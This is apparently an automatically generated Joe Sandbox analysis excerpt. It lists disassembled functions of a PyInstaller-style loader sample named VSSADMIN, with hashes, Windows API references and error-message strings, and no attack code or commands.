                                                                                                                                                                      • Instruction ID: 6a098fbf13fc729f86e8d03fb4107a33b8e2e945738758404f7dd677c4b02f99
                                                                                                                                                                      • Opcode Fuzzy Hash: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                                                                                                                                      • Instruction Fuzzy Hash: 33510426608BA187DA349F26E4581BAB7B1FB98B65F004122EBCF83684DF3DD045DB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: f$f$p$p$f
                                                                                                                                                                      • API String ID: 3215553584-1325933183
                                                                                                                                                                      • Opcode ID: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                                                                      • Instruction ID: aece6c676b0adb97a7f5f1c0a70427e95a1acb329a6bcbdebd219e3f3b4a6242
                                                                                                                                                                      • Opcode Fuzzy Hash: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                                                                      • Instruction Fuzzy Hash: 2612B4B2E0C94786FB205B16E0946BA7271FB82F64F864137D699876C4DF3CE480EB54
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message
                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                      • API String ID: 2030045667-3659356012
                                                                                                                                                                      • Opcode ID: e412112bf7a2c4920d5fc3316b35fb3f62ad84cc98d8238b18eca36b92c0785a
                                                                                                                                                                      • Instruction ID: a0598e4fadd19149a255bd768ab991572d06555c9effa631d1c1ddc6ed4a0ed0
                                                                                                                                                                      • Opcode Fuzzy Hash: e412112bf7a2c4920d5fc3316b35fb3f62ad84cc98d8238b18eca36b92c0785a
                                                                                                                                                                      • Instruction Fuzzy Hash: 32415E21A4CE8382EE24DB15E4916BA63B1EB86FA5F444433DE4D87B55EE3DE542C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                      • API String ID: 849930591-393685449
                                                                                                                                                                      • Opcode ID: 041d502785614f157d9e0dc40e6677f491242ac1b203480cf839ec3ef7e6c674
                                                                                                                                                                      • Instruction ID: e6db290d1871e006f48daed5d6a3a2ad39328485cda6319e717c874abdb35841
                                                                                                                                                                      • Opcode Fuzzy Hash: 041d502785614f157d9e0dc40e6677f491242ac1b203480cf839ec3ef7e6c674
                                                                                                                                                                      • Instruction Fuzzy Hash: BCE16F73A0CB4187EB209B65D4802AD77B0FB56BA9F104136EE4D97B55CF38E491C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C776CF
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C7771F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ByteCharMultiWide
• String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
• API String ID: 626452242-27947307
• Opcode ID: 8e1294a6cdcfa841333753f07aa6236aad2a9565d39a981db328a5fb7b946298
• Instruction ID: be9c5c0f96c7cc321c3e6c029572b49928f14f46e004a2b7fa553ec906b9ddcb
• Opcode Fuzzy Hash: 8e1294a6cdcfa841333753f07aa6236aad2a9565d39a981db328a5fb7b946298
• Instruction Fuzzy Hash: 1A416A32A0DF86C2E621DF15E48016AB6B5FB86BA4F584136DA8D87B95EF38E451C700
Uniqueness

Uniqueness Score: -1.00%

APIs
• WideCharToMultiByte.KERNEL32(?,00007FF614C736B9), ref: 00007FF614C77BB1
  • Part of subcall function 00007FF614C72620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF614C77774,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C72654
  • Part of subcall function 00007FF614C72620: MessageBoxW.USER32 ref: 00007FF614C72730
• WideCharToMultiByte.KERNEL32(?,00007FF614C736B9), ref: 00007FF614C77C25
Strings
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLastMessage
• String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
• API String ID: 3723044601-27947307
• Opcode ID: aab539b93ffeac37e32982e6298ac4f9f3ab9a0e846f993d4d23bb2dfd97e0ba
• Instruction ID: fe8a6ae26e3ecb7da4d6e6d34c4b00048e45e808c1be3054de304a6fa9a9bd34
• Opcode Fuzzy Hash: aab539b93ffeac37e32982e6298ac4f9f3ab9a0e846f993d4d23bb2dfd97e0ba
• Instruction Fuzzy Hash: 28216B31A0DF4796EA109F16E8800797AB1EB9AFA4B584137CA4EC3794EF7DE411C300
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$p$p
• API String ID: 3215553584-1995029353
• Opcode ID: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
• Instruction ID: be00e0ded957f39a9aad41b3018f731060724f15afe17f63d3cda6ad63f9dafa
• Opcode Fuzzy Hash: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
• Instruction Fuzzy Hash: 02128461E0C94386FB649A15D1942F976B1FB82F74F884137E68A876C4DF3CE580EB04
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ByteCharMultiWide
• String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
• API String ID: 626452242-876015163
• Opcode ID: 474bf15368175ae00485da3c5c6deb92760f83e3752d56c97991419ab165e02e
• Instruction ID: fc7d11dce1dbd0b2b2a54d215174a0690c67da5781ec21c6da92c7c9be470ab7
• Opcode Fuzzy Hash: 474bf15368175ae00485da3c5c6deb92760f83e3752d56c97991419ab165e02e
• Instruction Fuzzy Hash: 29418F32A0DE46C2EA10DF15E48017A66B5FB96FA4F148137DA8D87BA5EF3CE451C700
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(?,?,?,00007FF614C7D1CA,?,?,?,00007FF614C7CEBC,?,?,00000001,00007FF614C7CAD9), ref: 00007FF614C7CF9D
• GetLastError.KERNEL32(?,?,?,00007FF614C7D1CA,?,?,?,00007FF614C7CEBC,?,?,00000001,00007FF614C7CAD9), ref: 00007FF614C7CFAB
• LoadLibraryExW.KERNEL32(?,?,?,00007FF614C7D1CA,?,?,?,00007FF614C7CEBC,?,?,00000001,00007FF614C7CAD9), ref: 00007FF614C7CFD5
• FreeLibrary.KERNEL32(?,?,?,00007FF614C7D1CA,?,?,?,00007FF614C7CEBC,?,?,00000001,00007FF614C7CAD9), ref: 00007FF614C7D01B
• GetProcAddress.KERNEL32(?,?,?,00007FF614C7D1CA,?,?,?,00007FF614C7CEBC,?,?,00000001,00007FF614C7CAD9), ref: 00007FF614C7D027
Strings
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: 96cc8d1137d818a2009be7de16c2cee15406677aaf285b7c4d33305375866f21
• Instruction ID: 09a2d82cc85ce2739dfa8aa615a07dd884f482aea23070680b49e0b6b8009704
• Opcode Fuzzy Hash: 96cc8d1137d818a2009be7de16c2cee15406677aaf285b7c4d33305375866f21
• Instruction Fuzzy Hash: 9731BE22A1EE4292EE519B06A88097523F4FF4AFB5F591536DD1ECB390EF3CE4468710
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF614C77A60: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF614C726FB), ref: 00007FF614C77A9A
• ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF614C767F1,?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C764FF
  • Part of subcall function 00007FF614C72770: MessageBoxW.USER32 ref: 00007FF614C72845
Strings
• LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF614C76513
• LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF614C764D6
• LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF614C7655A
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
• String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
• API String ID: 1662231829-3498232454
• Opcode ID: 5c20c095824c1da7d1f4bea3d05580988457242eeef08c03b39c26993512e69f
• Instruction ID: 5329e482434e14f76dc2ae72854091868df9aaaebfc69258aac4c527fd38dbe9
• Opcode Fuzzy Hash: 5c20c095824c1da7d1f4bea3d05580988457242eeef08c03b39c26993512e69f
• Instruction Fuzzy Hash: 21318911B1CF8352FA609725E9D53BA6171AF9AFE1F844033DA4EC379AEE2DE5049700
Uniqueness

Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF614C726FB), ref: 00007FF614C77A9A
  • Part of subcall function 00007FF614C72620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF614C77774,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C72654
  • Part of subcall function 00007FF614C72620: MessageBoxW.USER32 ref: 00007FF614C72730
• MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF614C726FB), ref: 00007FF614C77B20
Strings
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                      • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                      • API String ID: 3723044601-876015163
                                                                                                                                                                      • Opcode ID: ef0c7189470ede6921ef3de76a81d580bff1fc53629992aced72f99ea96e9165
                                                                                                                                                                      • Instruction ID: 717150f64954594f96bb834c5812009267792c145566cc19a8c116bdf769a571
                                                                                                                                                                      • Opcode Fuzzy Hash: ef0c7189470ede6921ef3de76a81d580bff1fc53629992aced72f99ea96e9165
                                                                                                                                                                      • Instruction Fuzzy Hash: 59215526B0CE4292EB50DB19F480069A3B1FB86BE8F584137DB5CC3B69EE2DE5518700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A65F
                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A674
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A695
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A6C2
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A6D3
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A6E4
                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A6FF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                      • Opcode ID: 9603f04e73c1ac35bebd6b74082c40ddb301c2cc90fbe29b07207277116e1379
                                                                                                                                                                      • Instruction ID: 0c761902a80d3848f273854b2926a9bb2ad5779016771e9b17685e10aa081245
                                                                                                                                                                      • Opcode Fuzzy Hash: 9603f04e73c1ac35bebd6b74082c40ddb301c2cc90fbe29b07207277116e1379
                                                                                                                                                                      • Instruction Fuzzy Hash: 10218B24B0CE4342FA58672996C517A62725F4AFB4F180737E93EC77DAEE2DB441A700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                      • String ID: CONOUT$
                                                                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                                                                      • Opcode ID: 8e0e590b76c227ed4e0945dd3cc989df51f43b4687c0318c0d05d3449c58233d
                                                                                                                                                                      • Instruction ID: 342ce6e1e1fb8e72f295e9ca9060615c825662d53de512ff67ff20a91df6bdd1
                                                                                                                                                                      • Opcode Fuzzy Hash: 8e0e590b76c227ed4e0945dd3cc989df51f43b4687c0318c0d05d3449c58233d
                                                                                                                                                                      • Instruction Fuzzy Hash: F7119025B18E8286E7508B56F89432972B0FB89FF8F540236EA5EC77A4DF3ED5148740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A7D7
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A80D
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A83A
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A84B
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A85C
                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A877
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                      • Opcode ID: 8dfa007eb70710ac51225e31542f24e155c530b6ee80d7af8a446e0989fc2ffe
                                                                                                                                                                      • Instruction ID: 6c5ca6c08872f62a718d612997aa6df4b715a143c14ce02ef574d144d6167ecd
                                                                                                                                                                      • Opcode Fuzzy Hash: 8dfa007eb70710ac51225e31542f24e155c530b6ee80d7af8a446e0989fc2ffe
                                                                                                                                                                      • Instruction Fuzzy Hash: BF118E24F0CE4742FA18572996C517A21729F47FB0F144336E92EC77D6EE2DE4026710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                      • String ID: csm$f
                                                                                                                                                                      • API String ID: 2395640692-629598281
                                                                                                                                                                      • Opcode ID: 752f63a6eb654042196f5a98f7ed0cc27864ab03d65b16a783a14cfa4978e18e
                                                                                                                                                                      • Instruction ID: a248c42de3bc9d8e642e4a5ab875f693969a78506d1565703df18c64de22cdf8
                                                                                                                                                                      • Opcode Fuzzy Hash: 752f63a6eb654042196f5a98f7ed0cc27864ab03d65b16a783a14cfa4978e18e
                                                                                                                                                                      • Instruction Fuzzy Hash: 9D519132A1DA0387E754CF15E484A2D37A5FB46FAAF508132DA4A87748EF38E941C704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
